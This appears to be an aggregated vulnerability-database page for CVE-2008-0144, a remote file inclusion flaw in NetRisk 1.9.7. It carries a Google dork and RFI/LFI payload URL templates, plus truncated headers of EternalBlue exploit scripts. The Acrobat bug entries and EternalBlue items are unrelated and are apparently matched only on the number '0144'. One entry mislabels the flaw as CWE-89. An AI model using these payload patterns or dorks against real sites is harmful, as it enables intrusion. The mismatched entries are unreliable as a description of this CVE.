CVE-2008-0144
published 2008-01-08
CVE-2008-0144: PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page…
Priority P349 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 44.84% · 98.6th percentile
PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page parameter. NOTE: this can also be leveraged for local file inclusion using directory traversal sequences.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phprisk | netrisk | <= 1.9.7 | — |
| phprisk | netrisk | — | — |
GHSA
GHSA-7rrf-98rx-8v5m: PHP remote file inclusion vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-0144 [HIGH] CWE-89 GHSA-7rrf-98rx-8v5m: PHP remote file inclusion vulnerability in index
PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page parameter. NOTE: this can also be leveraged for local file inclusion using directory traversal sequences.
GHSA
GHSA-xg85-49cx-w236: Cross-site scripting (XSS) vulnerability in index
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-0186 [HIGH] CWE-79 GHSA-xg85-49cx-w236: Cross-site scripting (XSS) vulnerability in index
Cross-site scripting (XSS) vulnerability in index.php in NetRisk 1.9.7 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to CVE-2008-0144.
No detection rules found.
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-05-17
CVE-2017-0144 Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
EDB Note: Shellcode
- x64 ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42030.asm
- x86 ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42031.asm
Tested on:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86
Reference:
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
Bug detail:
- For the buffer overflow bug detail, please see htt
Exploit-DB
NetRisk 1.9.7 - Local/Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0144 NetRisk 1.9.7 - Local/Remote File Inclusion
---
#########################################################################
NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability #
#########################################################################
AUTHOR : S.W.A.T. #
HOME : http://svvat.ir #
Download : http://phprisk.org/netrisk_1.9.7.zip #
#########################################################################
DorKs : inurl:index.php?page=gamebrowser #
#########################################################################
## EXPLOIT : #
http://server.com/Path/index.php?page=[SHELL] #
http://server.com/Path/index.php?page=[-LFI-] #
#########################################################################
## GREETZ : Str0ke - Dj7xpl - DarKLiFe - NazNazi - XmorsTEAM #
#######
Bugzilla
CVE-2008-0726 Acroread memory corruption
bugzilla·2008-02-14·CVSS 9.3
CVE-2008-0726 [CRITICAL] CVE-2008-0726 Acroread memory corruption
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-0726 to the following vulnerability:
Integer overflow in Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via crafted arguments to the printSepsWithParams, which triggers memory corruption.
References:
http://www.zerodayinitiative.com/advisories/ZDI-08-004.html
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
Bugzilla
CVE-2007-5666 acroread JavaScript Insecure Library Search Path
bugzilla·2008-02-13·CVSS 6.2
CVE-2007-5666 [MEDIUM] CVE-2007-5666 acroread JavaScript Insecure Library Search Path
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5666 to the following vulnerability:
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
Bugzilla
CVE-2007-5663 acroread JavaScript Insecure Method Exposure
bugzilla·2008-02-13·CVSS 9.3
CVE-2007-5663 [CRITICAL] CVE-2007-5663 acroread JavaScript Insecure Method Exposure
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5663 to the following vulnerability:
Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via a crafted PDF file that calls an insecure JavaScript method in the EScript.api plug-in. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656
http://www.adobe.com/support/security/advisories/apsa08-01.html
http://www.kb.cert.org/vuls/id/140129
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Tu
Bugzilla
CVE-2007-5659 acroread Multiple buffer overflows
bugzilla·2008-02-13·CVSS 7.8
CVE-2007-5659 [HIGH] CVE-2007-5659 acroread Multiple buffer overflows
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5659 to the following vulnerability:
Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=657
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
http://marc.info/?l=bugtraq&m=119955114428283&w=2
http://secunia.com/advisories/28328
http://www.securityfocus.com/bid/27136
https://exchange.xforce.ibmcloud.com/vulnerabilities/39419
https://www.exploit-db.com/exploits/4833
Published: 2008-01-08